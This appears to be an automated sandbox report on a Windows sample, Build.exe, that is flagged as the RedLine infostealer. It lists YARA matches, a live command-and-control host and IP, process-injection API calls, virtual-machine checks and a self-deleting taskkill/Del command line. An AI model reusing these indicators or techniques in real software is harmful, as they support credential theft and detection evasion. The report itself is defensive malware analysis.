Source: Submitted Sample |
Integrated Neural Analysis Model: Matched 100.0% probability |
Source: Build.exe |
Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE |
Source: Build.exe |
Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE |
Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp |
Binary string: \??\C:\Windows\System.ServiceModel.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp |
Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp |
Binary string: \??\C:\Windows\System.ServiceModel.Internals.pdbbQT;r source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb|M~q source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp |
Binary string: System.ServiceModel.Internals.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp |
Binary string: ".ServiceModel.Internals.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp |
Binary string: \??\C:\Windows\dll\System.pdbX source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp |
Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: Build.exe, 00000000.00000002.1863379517.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdby source: Build.exe, 00000000.00000002.1863379517.0000000000ABF000.00000004.00000020.00020000.00000000.sdmp |
Binary string: erviceModel.Internals.pdb source: Build.exe, 00000000.00000002.1866156189.000000000646B000.00000004.00000020.00020000.00000000.sdmp |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb\M source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000ABF000.00000004.00000020.00020000.00000000.sdmp |
Binary string: 0__31bf3856ad364e35\System.ServiceModel.Internals.pdb) source: Build.exe, 00000000.00000002.1866156189.000000000646B000.00000004.00000020.00020000.00000000.sdmp |
Binary string: \??\C:\Windows\dll\System.ServiceModel.Internals.pdb8 source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp |
Binary string: System.ServiceModel.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp |
Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp |
Binary string: C:\Windows\System.ServiceModel.Internals.pdbpdbals.pdbqq source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp |
Binary string: symbols\dll\System.ServiceModel.Internals.pdb source: Build.exe, 00000000.00000002.1866138722.000000000645A000.00000004.00000010.00020000.00000000.sdmp |
Binary string: System.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp |
Source: unknown |
Network traffic detected: HTTP traffic on port 49731 -> 6677 |
Source: Yara match |
File source: Build.exe, type: SAMPLE |
Source: Yara match |
File source: 0.0.Build.exe.320000.0.unpack, type: UNPACKEDPE |
Source: global traffic |
TCP traffic: 192.168.2.4:49731 -> 147.185.221.16:6677 |
Source: global traffic |
HTTP traffic detected: POST /IRemotePanel HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/IRemotePanel/GetSettings"Host: medical-m.gl.at.ply.gg:6677Content-Length: 136Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive |
Source: Joe Sandbox View |
IP Address: 147.185.221.16 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic |
DNS traffic detected: DNS query: medical-m.gl.at.ply.gg |
Source: global traffic |
DNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa |
Source: unknown |
HTTP traffic detected: POST /IRemotePanel HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/IRemotePanel/GetSettings"Host: medical-m.gl.at.ply.gg:6677Content-Length: 136Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive |
Source: Build.exe |
String found in binary or memory: http://checkip.amazonaws.com/)https://ipinfo.io/ip |
Source: Build.exe, 00000000.00000002.1864630370.00000000027EF000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://medical-m.gl.at.ply.gg |
Source: Build.exe, 00000000.00000002.1864630370.00000000027D7000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://medical-m.gl.at.ply.gg:6677 |
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://medical-m.gl.at.ply.gg:6677/IRemotePanel |
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next |
Source: Build.exe, 00000000.00000002.1864630370.00000000027EF000.00000004.00000800.00020000.00000000.sdmp, Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp, Build.exe, 00000000.00000002.1864630370.00000000027E8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/ |
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing |
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault |
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous |
Source: Build.exe, 00000000.00000002.1864630370.00000000027D7000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: Build.exe, 00000000.00000002.1864630370.00000000027EF000.00000004.00000800.00020000.00000000.sdmp, Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp, Build.exe, 00000000.00000002.1864630370.00000000027E8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://tempuri.org/ |
Source: Build.exe, 00000000.00000002.1864630370.00000000027E8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://tempuri.org/0 |
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://tempuri.org/IRemotePanel/ |
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://tempuri.org/IRemotePanel/CompleteTaskLR |
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://tempuri.org/IRemotePanel/CompleteTaskResponse05 |
Source: Build.exe, 00000000.00000002.1864630370.00000000027E4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://tempuri.org/IRemotePanel/GetSettings |
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://tempuri.org/IRemotePanel/GetSettingsLR |
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://tempuri.org/IRemotePanel/GetSettingsResponse05 |
Source: Build.exe, 00000000.00000002.1864630370.00000000027E4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://tempuri.org/IRemotePanel/GetSettingsT |
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://tempuri.org/IRemotePanel/GetTasksLR |
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://tempuri.org/IRemotePanel/GetTasksResponse05 |
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://tempuri.org/IRemotePanel/SendClientInfoLR |
Source: Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://tempuri.org/IRemotePanel/SendClientInfoResponse05 |
Source: Build.exe |
String found in binary or memory: https://api.ipify.org |
Source: Build.exe |
String found in binary or memory: https://google.com/ |
Source: Build.exe |
String found in binary or memory: https://icanhazip.com5https://wtfismyip.com/textChttp://bot.whatismyipaddress.com/3http://checkip.dy |
Source: Build.exe, type: SAMPLE |
Matched rule: Windows_Trojan_RedLineStealer_17ee6a17 Author: unknown |
Source: Build.exe, type: SAMPLE |
Matched rule: Detects RedLine infostealer Author: ditekSHen |
Source: 0.0.Build.exe.320000.0.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_RedLineStealer_17ee6a17 Author: unknown |
Source: 0.0.Build.exe.320000.0.unpack, type: UNPACKEDPE |
Matched rule: Detects RedLine infostealer Author: ditekSHen |
Source: 00000000.00000000.1640140886.0000000000322000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_RedLineStealer_17ee6a17 Author: unknown |
Source: Process Memory Space: Build.exe PID: 6356, type: MEMORYSTR |
Matched rule: Windows_Trojan_RedLineStealer_17ee6a17 Author: unknown |
Source: C:\Users\user\Desktop\Build.exe |
Code function: 0_2_00CCDFE8 |
Source: C:\Users\user\Desktop\Build.exe |
Code function: 0_2_00CCD2B0 |
Source: C:\Users\user\Desktop\Build.exe |
Code function: 0_2_04C689C0 |
Source: C:\Users\user\Desktop\Build.exe |
Code function: 0_2_04C64B50 |
Source: C:\Users\user\Desktop\Build.exe |
Code function: 0_2_04C65611 |
Source: C:\Users\user\Desktop\Build.exe |
Code function: 0_2_04C67028 |
Source: C:\Users\user\Desktop\Build.exe |
Code function: 0_2_04C66FF6 |
Source: Build.exe, 00000000.00000002.1863379517.0000000000A3E000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameclr.dllT vs Build.exe |
Source: Build.exe, 00000000.00000000.1640202823.0000000000346000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string: OriginalFilenameRedLine.Client.exe0 vs Build.exe |
Source: Build.exe |
Binary or memory string: OriginalFilenameRedLine.Client.exe0 vs Build.exe |
Source: Build.exe, type: SAMPLE |
Matched rule: Windows_Trojan_RedLineStealer_17ee6a17 reference_sample = 497bc53c1c75003fe4ae3199b0ff656c085f21dffa71d00d7a3a33abce1a3382, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = a1f75937e83f72f61e027a1045374d3bd17cd387b223a6909b9aed52d2bc2580, id = 17ee6a17-161e-454a-baf1-2734995c82cd, last_modified = 2021-08-23 |
Source: Build.exe, type: SAMPLE |
Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073 |
Source: 0.0.Build.exe.320000.0.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_RedLineStealer_17ee6a17 reference_sample = 497bc53c1c75003fe4ae3199b0ff656c085f21dffa71d00d7a3a33abce1a3382, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = a1f75937e83f72f61e027a1045374d3bd17cd387b223a6909b9aed52d2bc2580, id = 17ee6a17-161e-454a-baf1-2734995c82cd, last_modified = 2021-08-23 |
Source: 0.0.Build.exe.320000.0.unpack, type: UNPACKEDPE |
Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073 |
Source: 00000000.00000000.1640140886.0000000000322000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_RedLineStealer_17ee6a17 reference_sample = 497bc53c1c75003fe4ae3199b0ff656c085f21dffa71d00d7a3a33abce1a3382, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = a1f75937e83f72f61e027a1045374d3bd17cd387b223a6909b9aed52d2bc2580, id = 17ee6a17-161e-454a-baf1-2734995c82cd, last_modified = 2021-08-23 |
Source: Process Memory Space: Build.exe PID: 6356, type: MEMORYSTR |
Matched rule: Windows_Trojan_RedLineStealer_17ee6a17 reference_sample = 497bc53c1c75003fe4ae3199b0ff656c085f21dffa71d00d7a3a33abce1a3382, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = a1f75937e83f72f61e027a1045374d3bd17cd387b223a6909b9aed52d2bc2580, id = 17ee6a17-161e-454a-baf1-2734995c82cd, last_modified = 2021-08-23 |
Source: classification engine |
Classification label: mal100.troj.evad.winEXE@8/0@2/1 |
Source: C:\Users\user\Desktop\Build.exe |
Mutant created: NULL |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3980:120:WilError_03 |
Source: Build.exe |
Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
Source: Build.exe |
Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80% |
Source: C:\Windows\SysWOW64\taskkill.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 6356) |
Source: Build.exe |
ReversingLabs: Detection: 78% |
Source: Build.exe |
Virustotal: Detection: 74% |
Source: unknown |
Process created: C:\Users\user\Desktop\Build.exe "C:\Users\user\Desktop\Build.exe" |
|
Source: C:\Users\user\Desktop\Build.exe |
Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C taskkill /F /PID 6356 && choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\Build.exe" |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /PID 6356 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3 |
|
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: mscoree.dll |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: apphelp.dll |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: kernel.appcore.dll |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: version.dll |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: vcruntime140_clr0400.dll |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: ucrtbase_clr0400.dll |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: windows.storage.dll |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: wldp.dll |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: profapi.dll |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: cryptsp.dll |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: rsaenh.dll |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: cryptbase.dll |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: rasapi32.dll |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: rasman.dll |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: rtutils.dll |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: mswsock.dll |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: winhttp.dll |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: ondemandconnroutehelper.dll |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: iphlpapi.dll |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: dhcpcsvc6.dll |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: dhcpcsvc.dll |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: dnsapi.dll |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: winnsi.dll |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: rasadhlp.dll |
Source: C:\Users\user\Desktop\Build.exe |
Section loaded: fwpuclnt.dll |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: version.dll |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: mpr.dll |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: framedynos.dll |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: dbghelp.dll |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: sspicli.dll |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: srvcli.dll |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: netutils.dll |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: kernel.appcore.dll |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: wbemcomn.dll |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: winsta.dll |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: amsi.dll |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: userenv.dll |
Source: C:\Windows\SysWOW64\taskkill.exe |
Section loaded: profapi.dll |
Source: C:\Windows\SysWOW64\choice.exe |
Section loaded: version.dll |
Source: Build.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR |
Source: Build.exe, LoadExecutor.cs |
.Net Code: SelfExecute System.Reflection.Assembly.Load(byte[]) |
Source: Build.exe |
Static PE information: 0xC739A26A [Sun Dec 1 16:25:14 2075 UTC] |
Source: C:\Users\user\Desktop\Build.exe |
Code function: 0_2_00CCF450 push ecx; ret |
0_2_00CCF6A2 |
Source: C:\Users\user\Desktop\Build.exe |
Code function: 0_2_00CCF650 push ecx; ret |
0_2_00CCF6A2 |
Source: C:\Users\user\Desktop\Build.exe |
Code function: 0_2_04C6E389 pushfd ; retf 0004h |
0_2_04C6E38A |
Source: C:\Users\user\Desktop\Build.exe |
Code function: 0_2_04C6AF70 push cs; ret |
0_2_04C6AFA4 |
Source: C:\Users\user\Desktop\Build.exe |
Code function: 0_2_04C6E868 pushfd ; retf 0004h |
0_2_04C6E86A |
Source: C:\Users\user\Desktop\Build.exe |
Code function: 0_2_04C6E818 pushfd ; retf 0004h |
0_2_04C6E81A |
Source: C:\Users\user\Desktop\Build.exe |
Process created: "cmd.exe" /C taskkill /F /PID 6356 && choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\Build.exe" |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\taskkill.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\Build.exe |
Memory allocated: CC0000 memory reserve | memory write watch |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Memory allocated: 2740000 memory reserve | memory write watch |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Memory allocated: D60000 memory reserve | memory write watch |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe TID: 5968 |
Thread sleep time: -922337203685477s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe TID: 5576 |
Thread sleep count: 134 > 30 |
Source: C:\Users\user\Desktop\Build.exe TID: 4144 |
Thread sleep count: 166 > 30 |
Source: Build.exe |
Binary or memory string: <VirtualMachine>k__BackingField |
Source: Build.exe |
Binary or memory string: set_VirtualMachine |
Source: Build.exe |
Binary or memory string: VMwareVMware |
Source: Build.exe |
Binary or memory string: VMWare |
Source: Build.exe |
Binary or memory string: get_VirtualMachine |
Source: Build.exe |
Binary or memory string: VEN_VMWARE |
Source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll |
Source: Build.exe, LibInvoker.cs |
Reference to suspicious API methods: NativeMethods.GetProcAddress(SystemNetMailSmtpNtlmAuthenticationModuleC, MicrosoftWinTimerElapsedEventHandlerKtionName) |
Source: Build.exe, LoadExecutor.cs |
Reference to suspicious API methods: libInvoker.CastToDelegate<NativeDelegates.VirtualAllocExDelegate>("VirtualAllocEx")(lpProcesSystemNetCertPolicyValidationCallbackv.hProcess, intPtr, ptr3->OptionalHeader.SizeOfImage, 12288u, 64u) |
Source: Build.exe, LoadExecutor.cs |
Reference to suspicious API methods: libInvoker.CastToDelegate<NativeDelegates.WriteProcessMemoryDelegate>("WriteProcessMemory")(lpProcesSystemNetCertPolicyValidationCallbackv.hProcess, intPtr, lSqlDependencyProcessDispatcherSqlConnectionContainerHashHelperU, ptr3->OptionalHeader.SizeOfHeaders, IntPtr.Zero) |
Source: C:\Users\user\Desktop\Build.exe |
Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C taskkill /F /PID 6356 && choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\Build.exe" |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /PID 6356 |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3 |
Source: C:\Users\user\Desktop\Build.exe |
Queries volume information: C:\Users\user\Desktop\Build.exe VolumeInformation |
Source: C:\Users\user\Desktop\Build.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation |
Source: C:\Users\user\Desktop\Build.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation |
Source: C:\Users\user\Desktop\Build.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation |
Source: C:\Users\user\Desktop\Build.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
Source: C:\Users\user\Desktop\Build.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation |
Source: Yara match |
File source: Build.exe, type: SAMPLE |
Source: Yara match |
File source: 0.0.Build.exe.320000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000000.00000000.1640140886.0000000000322000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: Build.exe PID: 6356, type: MEMORYSTR |